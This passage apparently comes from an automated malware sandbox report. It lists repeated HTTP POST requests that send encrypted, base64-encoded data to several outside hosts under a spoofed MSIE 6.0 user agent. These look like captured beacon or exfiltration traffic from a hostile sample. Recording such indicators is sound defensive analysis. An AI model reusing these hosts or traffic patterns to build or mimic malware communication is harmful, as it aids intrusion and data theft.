7a 4c 55 4b 4f 64 63 53 34 52 6c 6d 69 41 66 63 6e 4a 4b 4b 33 62 31 31 43 52 67 74 61 59 4b 5a 4c 6e 35 66 56 4c 57 71 72 58 55 52 37 51 44 64 55 74 7a 4b 77 77 67 6e 33 6b 2f 56 78 43 58 37 59 4e 38 4b 77 30 43 32 35 4e 2b 4c 57 53 51 6c 48 62 44 45 4d 52 72 7a 58 57 6d 6f 6d 54 77 41 46 45 46 4d 51 43 79 6e 78 6b 6a 42 47 4d 45 Data Ascii: bMT2fLX0mMvux+4lHH5gaq7C0nFDHv/NueT4B9w2VVLrEFKxC+TXWLIQOazJWt5SBlEij4di+V5PGq4zHkV++tTMDrI5UUn7tDkMAqj5SWPP1yZRBoKaJF9CxGDs/n2CbFirbR4hLNdLjFf53UlfdOmzl7KWl3QoRO3V77vWA6ELw9MqrxBjc9viS49GZTcq8yKFsi+wlBfIxRatY60833iMQ7EnLgHIug5NdqZizaVQfILKc2WYarE4GOr7Y32fd8YIWO8iBNsJVnD2J19S+9oUqUT9IhqSFer47OKY2Gz9QupAU8holI3rPJKvkorVjhRZ/CN/ROEcJTxK/YuQLRpjiFcus8xIFVjhDjorzJx8mU78gRHoYWIPn2raY5fWKoL3FGWc2zio+h55yvD9jXwv08kuvZpCr6SXH0teflfs45u45i8ctm3fDnYfJzLUKOdcS4RlmiAfcnJKK3b11CRgtaYKZLn5fVLWqrXUR7QDdUtzKwwgn3k/VxCX7YN8Kw0C25N+LWSQlHbDEMRrzXWmomTwAFEFMQCynxkjBGME
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 2f 6f 36 57 6b 56 6f 78 77 38 76 6c 52 37 38 63 66 56 44 4d 4c 4a 30 58 6d 4e 4a 4b 58 41 43 6a 4c 74 6d 61 73 2f 39 75 5a 35 58 71 45 6e 33 4c 75 57 48 6c 48 2b 39 4b 4e 67 74 34 78 6a 62 47 6c 50 63 55 5a 42 54 61 57 6b 6d 35 56 69 42 45 37 42 56 4f 38 63 6a 5a 78 47 6a 56 6c 50 73 4d 70 79 73 5a 71 57 50 31 7a 4f 55 46 33 76 71 4d 73 45 36 73 62 56 5a 76 4a 66 70 39 6b 2f 7a 39 78 64 6e 7a 68 36 4c 46 65 51 74 45 4a 76 64 42 61 42 49 48 4d 67 6a 58 73 61 70 61 44 79 30 78 6a 36 35 65 6e 6c 53 6a 37 31 74 67 72 30 4e 38 67 38 52 54 43 74 65 76 4d 75 73 6b 5a 56 70 66 57 4e 57 6d 65 39 38 6c 7a 30 45 62 47 79 35 2b 54 36 6a 6d 42 33 47 67 68 4e 71 6e 73 48 71 6b 6b 76 61 49 6a 43 34 6e 52 32 30 6a 4b 6e 78 69 61 7a 72 59 4b 33 36 34 45 63 62 71 46 53 4d 4d 76 54 43 55 6d 6d 64 35 71 61 32 70 76 59 44 6f 44 74 49 57 31 53 45 58 72 55 64 72 65 53 45 43 6c 6a 4a 52 35 37 6b 76 73 54 76 69 68 71 45 2b 48 46 62 70 30 4c 6c 41 68 57 6f 52 73 52 46 4c 62 70 78 52 47 5a 6d 56 50 73 62 4c 36 5a 6f 2f 63 56 75 2b 58 4f 4f 6c 4b 4b 70 66 48 44 55 52 39 2b 6c 67 6a 32 5a 4e 32 50 74 45 6f 49 7a 6e 48 55 58 61 67 6e 6c 47 4d 54 68 4d 5a 36 2b 47 41 30 6d 6b 6d 44 66 34 4a 34 66 51 5a 75 4c 7a 53 6e 76 67 4b 4d 5a 4c 64 57 34 38 43 36 71 76 78 4c 73 51 4e 53 2f 52 65 6e 50 64 63 71 4f 6b 6b 61 33 6e 69 56 75 75 76 49 69 59 73 55 4c 47 37 65 73 66 57 71 59 45 44 6a 45 6e 31 44 33 78 70 32 6f 67 51 62 6b 71 57 70 34 37 31 75 6e 49 45 71 35 4f 47 39 59 65 33 6c 77 54 30 45 65 55 64 71 4c 67 4f 34 30 2b 71 66 55 69 56 45 4c 33 79 35 4e 52 35 41 58 4b 6b 6b 33 34 30 36 66 61 37 69 34 74 44 65 41 6e 35 7a 62 55 43 69 73 46 64 79 38 3d Data Ascii: /o6WkVoxw8vlR78cfVDMLJ0XmNJKXACjLtmas/9uZ5XqEn3LuWHlH+9KNgt4xjbGlPcUZBTaWkm5ViBE7BVO8cjZxGjVlPsMpysZqWP1zOUF3vqMsE6sbVZvJfp9k/z9xdnzh6LFeQtEJvdBaBIHMgjXsapaDy0xj65enlSj71tgr0N8g8RTCtevMuskZVpfWNWme98lz0EbGy5+T6jmB3GghNqnsHqkkvaIjC4nR20jKnxiazrYK364EcbqFSMMvTCUmmd5qa2pvYDoDtIW1SEXrUdreSECljJR57kvsTvihqE+HFbp0LlAhWoRsRFLbpxRGZmVPsbL6Zo/cVu+XOOlKKpfHDUR9+lgj2ZN2PtEoIznHUXagnlGMThMZ6+GA0mkmDf4J4fQZuLzSnvgKMZLdW48C6qvxLsQNS/RenPdcqOkka3niVuuvIiYsULG7esfWqYEDjEn1D3xp2ogQbkqWp471unIEq5OG9Ye3lwT0EeUdqLgO40+qfUiVEL3y5NR5AXKkk3406fa7i4tDeAn5zbUCisFdy8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 75 41 61 4d 70 55 42 43 51 73 30 6b 54 65 56 33 45 39 42 78 68 33 50 6e 33 4e 55 6f 62 6a 53 45 64 44 32 49 52 79 33 64 4b 50 36 59 71 64 36 63 54 54 30 72 30 32 2b 67 55 4b 4f 63 67 6e 2b 31 75 74 62 6a 76 31 76 6d 73 44 42 62 71 54 71 49 4b 6e 39 4c 6e 4d 39 50 41 4a 4a 4e 67 39 49 34 33 46 57 4b 43 6a 52 37 75 6a 52 77 71 59 72 54 55 4e 4c 4c 39 47 65 45 32 56 32 68 38 6e 68 33 4c 77 33 64 59 32 75 63 64 53 33 50 34 78 64 31 71 72 70 41 37 56 78 2f 64 62 44 65 79 51 7a 78 32 47 31 33 42 39 6e 57 53 66 72 32 6a 7a 45 68 63 4d 53 34 49 45 6f 75 52 35 53 46 4e 72 43 4f 37 58 4a 7a 63 42 36 58 52 32 72 4f 44 59 4b 6e 4d 64 79 74 41 79 66 2b 48 41 62 34 6a 30 38 49 7a 42 34 79 69 31 4a 57 70 64 6b 35 53 48 71 58 38 51 51 42 41 57 51 4f 6c 6a 75 53 58 73 37 6e 56 62 30 6a 47 62 72 74 64 4c 30 61 7a 6a 37 6a 55 49 33 58 46 41 35 34 50 37 48 58 64 45 48 6c 77 6f 73 75 41 55 4a 47 6d 55 4c 68 74 53 37 46 51 6c 70 6e 62 5a 4c 65 41 45 74 34 70 67 2b 70 31 30 4f 69 73 4a 79 6b 6e 52 4c 4a 77 37 72 4d 66 2f 2f 6a 31 56 48 36 50 6c 50 71 4f 45 6d 48 45 6a 59 74 34 57 4d 58 76 35 33 30 4e 55 6b 41 74 69 45 63 46 51 4d 71 61 48 56 35 43 4a 65 6c 54 54 4e 72 32 68 72 36 30 74 37 54 7a 4f 31 61 54 61 5a 70 2f 39 76 37 54 75 4b 79 68 4c 67 4f 73 33 7a 4f 30 49 61 53 6c 30 6b 55 48 5a 64 4a 67 67 30 70 4f 7a 6e 73 4d 64 56 79 74 47 51 63 38 6e 66 6e 43 42 5a 71 6b 37 48 56 46 72 59 5a 5a 76 33 4a 37 46 43 42 6e 4f 37 30 51 31 5a 76 6f 69 6b 39 61 33 30 4f 41 42 56 47 47 32 6f 4b 58 48 4a 78 67 71 78 75 58 2f 64 52 59 4a 46 4f 36 67 67 43 78 68 4b 49 6b 4d 53 79 7a 61 44 74 2f 6c 6d 4f 4e 62 67 41 78 41 58 67 37 47 6c 55 53 69 69 48 46 38 66 6a 6a 74 74 75 31 45 46 32 74 69 54 69 Data Ascii: uAaMpUBCQs0kTeV3E9Bxh3Pn3NUobjSEdD2IRy3dKP6Yqd6cTT0r02+gUKOcgn+1utbjv1vmsDBbqTqIKn9LnM9PAJJNg9I43FWKCjR7ujRwqYrTUNLL9GeE2V2h8nh3Lw3dY2ucdS3P4xd1qrpA7Vx/dbDeyQzx2G13B9nWSfr2jzEhcMS4IEouR5SFNrCO7XJzcB6XR2rODYKnMdytAyf+HAb4j08IzB4yi1JWpdk5SHqX8QQBAWQOljuSXs7nVb0jGbrtdL0azj7jUI3XFA54P7HXdEHlwosuAUJGmULhtS7FQlpnbZLeAEt4pg+p10OisJyknRLJw7rMf//j1VH6PlPqOEmHEjYt4WMXv530NUkAtiEcFQMqaHV5CJelTTNr2hr60t7TzO1aTaZp/9v7TuKyhLgOs3zO0IaSl0kUHZdJgg0pOznsMdVytGQc8nfnCBZqk7HVFrYZZv3J7FCBnO70Q1Zvoik9a30OABVGG2oKXHJxgqxuX/dRYJFO6ggCxhKIkMSyzaDt/lmONbgAxAXg7GlUSiiHF8fjjttu1EF2tiTi
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 75 41 61 4d 70 55 42 43 51 73 30 6b 54 65 56 33 45 39 42 78 68 33 50 6e 33 4e 55 6f 62 6a 53 45 64 44 32 49 52 79 33 64 4b 50 36 59 71 64 36 63 54 54 30 72 30 32 2b 67 55 4b 4f 63 67 6e 2b 31 75 74 62 6a 76 31 76 6d 73 44 42 62 71 54 71 49 4b 6e 39 4c 6e 4d 39 50 41 4a 4a 4e 67 39 49 34 33 46 57 4b 43 6a 52 37 75 6a 52 77 71 59 72 54 55 4e 4c 4c 39 47 65 45 32 56 32 68 38 6e 68 33 4c 77 33 64 59 32 75 63 64 53 33 50 34 78 64 31 71 72 70 41 37 56 78 2f 64 62 44 65 79 51 7a 78 32 47 31 33 42 39 6e 57 53 66 72 32 6a 7a 45 68 63 4d 53 34 49 45 6f 75 52 35 53 46 4e 72 43 4f 37 58 4a 7a 63 42 36 58 52 32 72 4f 44 59 4b 6e 4d 64 79 74 41 79 66 2b 48 41 62 34 6a 30 38 49 7a 42 34 79 69 31 4a 57 70 64 6b 35 53 48 71 58 38 51 51 42 41 57 51 4f 6c 6a 75 53 58 73 37 6e 56 62 30 6a 47 62 72 74 64 4c 30 61 7a 6a 37 6a 55 49 33 58 46 41 35 34 50 37 48 58 64 45 48 6c 77 6f 73 75 41 55 4a 47 6d 55 4c 68 74 53 37 46 51 6c 70 6e 62 5a 4c 65 41 45 74 34 70 67 2b 70 31 30 4f 69 73 4a 79 6b 6e 52 4c 4a 77 37 72 4d 66 2f 2f 6a 31 56 48 36 50 6c 50 71 4f 45 6d 48 45 6a 59 74 34 57 4d 58 76 35 33 30 4e 55 6b 41 74 69 45 63 46 51 4d 71 61 48 56 35 43 4a 65 6c 54 54 4e 72 32 68 72 36 30 74 37 54 7a 4f 31 61 54 61 5a 70 2f 39 76 37 54 75 4b 79 68 4c 67 4f 73 33 7a 4f 30 49 61 53 6c 30 6b 55 48 5a 64 4a 67 67 30 70 4f 7a 6e 73 4d 64 56 79 74 47 51 63 38 6e 66 6e 43 42 5a 71 6b 37 48 56 46 72 59 5a 5a 76 33 4a 37 46 43 42 6e 4f 37 30 51 31 5a 76 6f 69 6b 39 61 33 30 4f 41 42 56 47 47 32 6f 4b 58 48 4a 78 67 71 78 75 58 2f 64 52 59 4a 46 4f 36 67 67 43 78 68 4b 49 6b 4d 53 79 7a 61 44 74 2f 6c 6d 4f 4e 62 67 41 78 41 58 67 37 47 6c 55 53 69 69 48 46 38 66 6a 6a 74 74 75 31 45 46 32 74 69 54 69 Data Ascii: uAaMpUBCQs0kTeV3E9Bxh3Pn3NUobjSEdD2IRy3dKP6Yqd6cTT0r02+gUKOcgn+1utbjv1vmsDBbqTqIKn9LnM9PAJJNg9I43FWKCjR7ujRwqYrTUNLL9GeE2V2h8nh3Lw3dY2ucdS3P4xd1qrpA7Vx/dbDeyQzx2G13B9nWSfr2jzEhcMS4IEouR5SFNrCO7XJzcB6XR2rODYKnMdytAyf+HAb4j08IzB4yi1JWpdk5SHqX8QQBAWQOljuSXs7nVb0jGbrtdL0azj7jUI3XFA54P7HXdEHlwosuAUJGmULhtS7FQlpnbZLeAEt4pg+p10OisJyknRLJw7rMf//j1VH6PlPqOEmHEjYt4WMXv530NUkAtiEcFQMqaHV5CJelTTNr2hr60t7TzO1aTaZp/9v7TuKyhLgOs3zO0IaSl0kUHZdJgg0pOznsMdVytGQc8nfnCBZqk7HVFrYZZv3J7FCBnO70Q1Zvoik9a30OABVGG2oKXHJxgqxuX/dRYJFO6ggCxhKIkMSyzaDt/lmONbgAxAXg7GlUSiiHF8fjjttu1EF2tiTi
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 57 6c 42 50 32 6c 50 61 64 63 30 74 39 59 71 62 47 68 75 44 38 76 77 66 75 33 73 35 4c 35 63 41 4e 30 58 31 66 74 65 53 48 4a 34 47 78 39 74 64 59 63 57 75 76 31 52 6f 2b 68 54 75 77 49 6a 36 42 6a 65 58 4d 79 33 68 61 50 59 47 36 61 4e 2b 7a 56 68 6a 4e 33 2f 4c 42 74 59 69 37 4d 48 62 55 35 65 48 75 61 6e 44 57 4d 4a 61 6a 45 30 36 45 2b 58 70 31 30 55 6f 51 4d 36 7a 63 42 45 5a 77 2b 70 58 72 43 69 76 67 78 37 47 6c 47 50 4d 2b 73 6d 58 43 72 7a 56 30 67 66 31 53 44 34 72 2b 35 5a 58 50 76 31 72 4c 48 6e 77 54 73 54 35 30 70 59 39 4c 53 76 49 79 51 75 6a 5a 77 74 2b 35 35 55 52 35 4e 48 76 64 33 58 77 73 46 2b 76 74 64 30 70 33 6a 6f 74 59 49 50 68 50 59 68 73 68 43 6e 44 4d 47 31 4a 73 76 59 61 43 4d 75 46 74 69 73 57 69 33 41 66 66 4f 4b 74 6b 43 7a 49 44 31 4b 39 6b 57 73 6e 53 49 44 6f 68 56 71 64 41 66 47 50 6d 48 6e 44 66 6c 61 58 39 56 57 47 2b 66 63 71 31 6a 50 68 32 67 4f 70 4f 30 71 5a 33 53 64 58 57 79 75 51 6f 72 34 4b 69 38 59 72 54 2f 57 53 6f 42 31 4a 51 44 55 34 58 69 35 41 50 46 62 64 79 6a 36 50 59 41 31 48 2f 57 6d 2b 4a 66 63 4b 56 51 72 52 37 56 59 6d 39 33 51 74 77 34 68 65 75 30 78 52 52 72 70 31 4a 65 54 71 4d 34 51 74 51 56 63 2b 43 63 30 31 50 31 54 38 43 51 59 4a 68 36 51 45 73 51 4e 4e 44 36 74 70 47 44 52 4b 63 53 37 48 36 2b 69 6d 4f 71 66 51 6a 70 4d 36 41 38 55 62 75 76 4c 42 30 6a 77 69 43 4d 38 74 76 43 7a 68 34 36 69 58 55 50 4f 6e 53 38 38 32 73 39 63 49 65 6e 43 78 47 75 79 5a 51 33 58 48 71 35 53 77 6a 62 6d 36 64 5a 6e 4a 33 68 54 37 34 55 72 4d 6e 51 67 77 37 54 69 65 59 77 55 48 4d 62 36 51 65 69 65 4b 6b 69 52 39 48 6d 71 57 74 71 37 45 52 64 6b 55 35 33 34 72 62 59 71 2b 48 4c 55 4e 76 38 71 65 56 64 78 35 Data Ascii: WlBP2lPadc0t9YqbGhuD8vwfu3s5L5cAN0X1fteSHJ4Gx9tdYcWuv1Ro+hTuwIj6BjeXMy3haPYG6aN+zVhjN3/LBtYi7MHbU5eHuanDWMJajE06E+Xp10UoQM6zcBEZw+pXrCivgx7GlGPM+smXCrzV0gf1SD4r+5ZXPv1rLHnwTsT50pY9LSvIyQujZwt+55UR5NHvd3XwsF+vtd0p3jotYIPhPYhshCnDMG1JsvYaCMuFtisWi3AffOKtkCzID1K9kWsnSIDohVqdAfGPmHnDflaX9VWG+fcq1jPh2gOpO0qZ3SdXWyuQor4Ki8YrT/WSoB1JQDU4Xi5APFbdyj6PYA1H/Wm+JfcKVQrR7VYm93Qtw4heu0xRRrp1JeTqM4QtQVc+Cc01P1T8CQYJh6QEsQNND6tpGDRKcS7H6+imOqfQjpM6A8UbuvLB0jwiCM8tvCzh46iXUPOnS882s9cIenCxGuyZQ3XHq5Swjbm6dZnJ3hT74UrMnQgw7TieYwUHMb6QeieKkiR9HmqWtq7ERdkU534rbYq+HLUNv8qeVdx5
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 57 6c 42 50 32 6c 50 61 64 63 30 74 39 59 71 62 47 68 75 44 38 76 77 66 75 33 73 35 4c 35 63 41 4e 30 58 31 66 74 65 53 48 4a 34 47 78 39 74 64 59 63 57 75 76 31 52 6f 2b 68 54 75 77 49 6a 36 42 6a 65 58 4d 79 33 68 61 50 59 47 36 61 4e 2b 7a 56 68 6a 4e 33 2f 4c 42 74 59 69 37 4d 48 62 55 35 65 48 75 61 6e 44 57 4d 4a 61 6a 45 30 36 45 2b 58 70 31 30 55 6f 51 4d 36 7a 63 42 45 5a 77 2b 70 58 72 43 69 76 67 78 37 47 6c 47 50 4d 2b 73 6d 58 43 72 7a 56 30 67 66 31 53 44 34 72 2b 35 5a 58 50 76 31 72 4c 48 6e 77 54 73 54 35 30 70 59 39 4c 53 76 49 79 51 75 6a 5a 77 74 2b 35 35 55 52 35 4e 48 76 64 33 58 77 73 46 2b 76 74 64 30 70 33 6a 6f 74 59 49 50 68 50 59 68 73 68 43 6e 44 4d 47 31 4a 73 76 59 61 43 4d 75 46 74 69 73 57 69 33 41 66 66 4f 4b 74 6b 43 7a 49 44 31 4b 39 6b 57 73 6e 53 49 44 6f 68 56 71 64 41 66 47 50 6d 48 6e 44 66 6c 61 58 39 56 57 47 2b 66 63 71 31 6a 50 68 32 67 4f 70 4f 30 71 5a 33 53 64 58 57 79 75 51 6f 72 34 4b 69 38 59 72 54 2f 57 53 6f 42 31 4a 51 44 55 34 58 69 35 41 50 46 62 64 79 6a 36 50 59 41 31 48 2f 57 6d 2b 4a 66 63 4b 56 51 72 52 37 56 59 6d 39 33 51 74 77 34 68 65 75 30 78 52 52 72 70 31 4a 65 54 71 4d 34 51 74 51 56 63 2b 43 63 30 31 50 31 54 38 43 51 59 4a 68 36 51 45 73 51 4e 4e 44 36 74 70 47 44 52 4b 63 53 37 48 36 2b 69 6d 4f 71 66 51 6a 70 4d 36 41 38 55 62 75 76 4c 42 30 6a 77 69 43 4d 38 74 76 43 7a 68 34 36 69 58 55 50 4f 6e 53 38 38 32 73 39 63 49 65 6e 43 78 47 75 79 5a 51 33 58 48 71 35 53 77 6a 62 6d 36 64 5a 6e 4a 33 68 54 37 34 55 72 4d 6e 51 67 77 37 54 69 65 59 77 55 48 4d 62 36 51 65 69 65 4b 6b 69 52 39 48 6d 71 57 74 71 37 45 52 64 6b 55 35 33 34 72 62 59 71 2b 48 4c 55 4e 76 38 71 65 56 64 78 35 Data Ascii: WlBP2lPadc0t9YqbGhuD8vwfu3s5L5cAN0X1fteSHJ4Gx9tdYcWuv1Ro+hTuwIj6BjeXMy3haPYG6aN+zVhjN3/LBtYi7MHbU5eHuanDWMJajE06E+Xp10UoQM6zcBEZw+pXrCivgx7GlGPM+smXCrzV0gf1SD4r+5ZXPv1rLHnwTsT50pY9LSvIyQujZwt+55UR5NHvd3XwsF+vtd0p3jotYIPhPYhshCnDMG1JsvYaCMuFtisWi3AffOKtkCzID1K9kWsnSIDohVqdAfGPmHnDflaX9VWG+fcq1jPh2gOpO0qZ3SdXWyuQor4Ki8YrT/WSoB1JQDU4Xi5APFbdyj6PYA1H/Wm+JfcKVQrR7VYm93Qtw4heu0xRRrp1JeTqM4QtQVc+Cc01P1T8CQYJh6QEsQNND6tpGDRKcS7H6+imOqfQjpM6A8UbuvLB0jwiCM8tvCzh46iXUPOnS882s9cIenCxGuyZQ3XHq5Swjbm6dZnJ3hT74UrMnQgw7TieYwUHMb6QeieKkiR9HmqWtq7ERdkU534rbYq+HLUNv8qeVdx5
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 55 43 37 51 71 71 58 67 6e 63 31 39 53 41 57 63 54 42 6b 53 68 52 37 41 58 4c 6a 7a 51 49 53 44 71 64 63 58 6b 6c 66 6d 74 6a 2f 38 66 4d 7a 58 67 43 35 69 57 52 64 65 79 49 6e 53 2f 78 76 6e 6f 73 45 67 56 63 43 32 5a 34 4a 4b 77 6b 33 63 61 6f 77 78 37 33 34 61 54 52 33 41 34 30 36 65 45 2b 73 53 65 7a 6f 71 65 7a 33 63 57 62 4a 6f 63 50 61 38 30 6a 54 6d 62 34 45 50 73 47 4e 79 57 33 57 67 30 78 69 32 74 6b 5a 70 49 61 57 35 7a 59 55 70 2f 35 71 47 5a 44 6c 6b 56 6c 4f 54 63 70 4e 51 45 7a 39 39 54 54 6c 4e 47 38 49 7a 43 66 34 79 76 35 78 6b 44 70 47 43 6e 73 4c 39 62 75 5a 61 30 62 55 50 38 4e 6f 55 69 4f 53 44 38 4b 4a 4b 36 4d 44 55 30 50 71 58 35 30 63 63 7a 76 2b 66 35 66 64 57 72 47 74 65 59 71 64 44 6e 67 54 44 6b 4a 67 47 35 32 4e 54 44 4c 43 57 4f 44 47 32 51 42 2b 41 32 77 54 75 78 47 59 4d 79 54 76 78 2f 39 44 42 2f 38 6d 48 67 6f 34 47 39 2f 68 6d 73 50 4f 7a 53 58 6d 51 45 54 48 41 75 59 63 72 72 51 4f 4d 71 4d 70 74 50 53 30 42 66 62 54 44 49 46 69 42 69 52 33 53 37 31 73 55 78 4c 62 4f 4d 70 6e 4a 78 35 78 35 2b 33 78 6a 2b 77 55 65 45 35 62 46 4a 47 71 70 57 49 59 53 56 2b 30 48 73 2b 46 72 46 77 31 74 6b 6f 74 75 6b 6a 45 62 31 4a 6e 47 48 74 33 38 36 34 6a 46 76 54 69 32 75 74 49 49 49 68 75 70 61 4c 6f 31 47 63 63 67 48 78 6d 78 57 33 4f 59 41 45 2f 32 77 45 77 76 67 79 38 38 59 53 62 34 79 47 72 48 38 34 6a 62 6d 4b 76 63 69 54 32 51 6c 6a 6b 55 4c 32 74 46 6c 79 74 4f 72 39 58 32 79 67 6b 79 36 4a 36 63 37 43 55 48 43 34 44 46 6a 66 66 70 71 64 75 38 69 4f 54 39 33 42 6a 50 41 4a 4c 4a 41 44 72 38 75 55 71 54 71 68 41 66 37 6d 36 63 42 61 6b 6f 67 35 50 34 52 30 63 61 41 63 54 4a 6e 57 6b 55 4c 61 6c 47 6b 6e 4f 71 37 68 6b 33 48 44 63 45 6b 43 62 43 66 68 59 6e 44 4e 53 46 53 70 67 6a 76 67 3d 3d Data Ascii: UC7QqqXgnc19SAWcTBkShR7AXLjzQISDqdcXklfmtj/8fMzXgC5iWRdeyInS/xvnosEgVcC2Z4JKwk3caowx734aTR3A406eE+sSezoqez3cWbJocPa80jTmb4EPsGNyW3Wg0xi2tkZpIaW5zYUp/5qGZDlkVlOTcpNQEz99TTlNG8IzCf4yv5xkDpGCnsL9buZa0bUP8NoUiOSD8KJK6MDU0PqX50cczv+f5fdWrGteYqdDngTDkJgG52NTDLCWODG2QB+A2wTuxGYMyTvx/9DB/8mHgo4G9/hmsPOzSXmQETHAuYcrrQOMqMptPS0BfbTDIFiBiR3S71sUxLbOMpnJx5x5+3xj+wUeE5bFJGqpWIYSV+0Hs+FrFw1tkotukjEb1JnGHt3864jFvTi2utIIIhupaLo1GccgHxmxW3OYAE/2wEwvgy88YSb4yGrH84jbmKvciT2QljkUL2tFlytOr9X2ygky6J6c7CUHC4DFjffpqdu8iOT93BjPAJLJADr8uUqTqhAf7m6cBakog5P4R0caAcTJnWkULalGknOq7hk3HDcEkCbCfhYnDNSFSpgjvg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 55 43 37 51 71 71 58 67 6e 63 31 39 53 41 57 63 54 42 6b 53 68 52 37 41 58 4c 6a 7a 51 49 53 44 71 64 63 58 6b 6c 66 6d 74 6a 2f 38 66 4d 7a 58 67 43 35 69 57 52 64 65 79 49 6e 53 2f 78 76 6e 6f 73 45 67 56 63 43 32 5a 34 4a 4b 77 6b 33 63 61 6f 77 78 37 33 34 61 54 52 33 41 34 30 36 65 45 2b 73 53 65 7a 6f 71 65 7a 33 63 57 62 4a 6f 63 50 61 38 30 6a 54 6d 62 34 45 50 73 47 4e 79 57 33 57 67 30 78 69 32 74 6b 5a 70 49 61 57 35 7a 59 55 70 2f 35 71 47 5a 44 6c 6b 56 6c 4f 54 63 70 4e 51 45 7a 39 39 54 54 6c 4e 47 38 49 7a 43 66 34 79 76 35 78 6b 44 70 47 43 6e 73 4c 39 62 75 5a 61 30 62 55 50 38 4e 6f 55 69 4f 53 44 38 4b 4a 4b 36 4d 44 55 30 50 71 58 35 30 63 63 7a 76 2b 66 35 66 64 57 72 47 74 65 59 71 64 44 6e 67 54 44 6b 4a 67 47 35 32 4e 54 44 4c 43 57 4f 44 47 32 51 42 2b 41 32 77 54 75 78 47 59 4d 79 54 76 78 2f 39 44 42 2f 38 6d 48 67 6f 34 47 39 2f 68 6d 73 50 4f 7a 53 58 6d 51 45 54 48 41 75 59 63 72 72 51 4f 4d 71 4d 70 74 50 53 30 42 66 62 54 44 49 46 69 42 69 52 33 53 37 31 73 55 78 4c 62 4f 4d 70 6e 4a 78 35 78 35 2b 33 78 6a 2b 77 55 65 45 35 62 46 4a 47 71 70 57 49 59 53 56 2b 30 48 73 2b 46 72 46 77 31 74 6b 6f 74 75 6b 6a 45 62 31 4a 6e 47 48 74 33 38 36 34 6a 46 76 54 69 32 75 74 49 49 49 68 75 70 61 4c 6f 31 47 63 63 67 48 78 6d 78 57 33 4f 59 41 45 2f 32 77 45 77 76 67 79 38 38 59 53 62 34 79 47 72 48 38 34 6a 62 6d 4b 76 63 69 54 32 51 6c 6a 6b 55 4c 32 74 46 6c 79 74 4f 72 39 58 32 79 67 6b 79 36 4a 36 63 37 43 55 48 43 34 44 46 6a 66 66 70 71 64 75 38 69 4f 54 39 33 42 6a 50 41 4a 4c 4a 41 44 72 38 75 55 71 54 71 68 41 66 37 6d 36 63 42 61 6b 6f 67 35 50 34 52 30 63 61 41 63 54 4a 6e 57 6b 55 4c 61 6c 47 6b 6e 4f 71 37 68 6b 33 48 44 63 45 6b 43 62 43 66 68 59 6e 44 4e 53 46 53 70 67 6a 76 67 3d 3d Data Ascii: UC7QqqXgnc19SAWcTBkShR7AXLjzQISDqdcXklfmtj/8fMzXgC5iWRdeyInS/xvnosEgVcC2Z4JKwk3caowx734aTR3A406eE+sSezoqez3cWbJocPa80jTmb4EPsGNyW3Wg0xi2tkZpIaW5zYUp/5qGZDlkVlOTcpNQEz99TTlNG8IzCf4yv5xkDpGCnsL9buZa0bUP8NoUiOSD8KJK6MDU0PqX50cczv+f5fdWrGteYqdDngTDkJgG52NTDLCWODG2QB+A2wTuxGYMyTvx/9DB/8mHgo4G9/hmsPOzSXmQETHAuYcrrQOMqMptPS0BfbTDIFiBiR3S71sUxLbOMpnJx5x5+3xj+wUeE5bFJGqpWIYSV+0Hs+FrFw1tkotukjEb1JnGHt3864jFvTi2utIIIhupaLo1GccgHxmxW3OYAE/2wEwvgy88YSb4yGrH84jbmKvciT2QljkUL2tFlytOr9X2ygky6J6c7CUHC4DFjffpqdu8iOT93BjPAJLJADr8uUqTqhAf7m6cBakog5P4R0caAcTJnWkULalGknOq7hk3HDcEkCbCfhYnDNSFSpgjvg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 6b 75 4c 78 4c 2b 50 54 73 73 30 69 78 70 6d 6f 61 69 63 62 6f 41 79 63 4b 78 55 4a 51 4f 51 66 78 34 2f 41 71 31 77 57 70 51 38 6c 6a 32 4d 4c 47 55 66 43 78 72 4a 76 61 41 63 6c 35 48 77 44 4d 61 79 2f 62 71 30 6e 6b 36 52 53 65 30 4b 6b 6f 6e 49 54 61 6c 2f 34 57 36 68 4c 64 61 75 6f 74 76 6f 53 41 47 2f 7a 6e 6a 5a 43 4a 78 7a 58 37 49 31 2f 61 63 4e 47 4b 66 55 63 63 4a 76 61 42 52 42 48 49 65 35 35 50 77 36 71 76 38 6e 50 31 6e 47 50 6a 49 47 72 76 42 37 6d 4a 44 4f 41 64 32 41 72 35 75 44 79 4b 4a 66 4b 63 34 69 41 53 36 57 63 75 6f 74 38 73 46 4c 74 4e 50 47 43 73 65 50 79 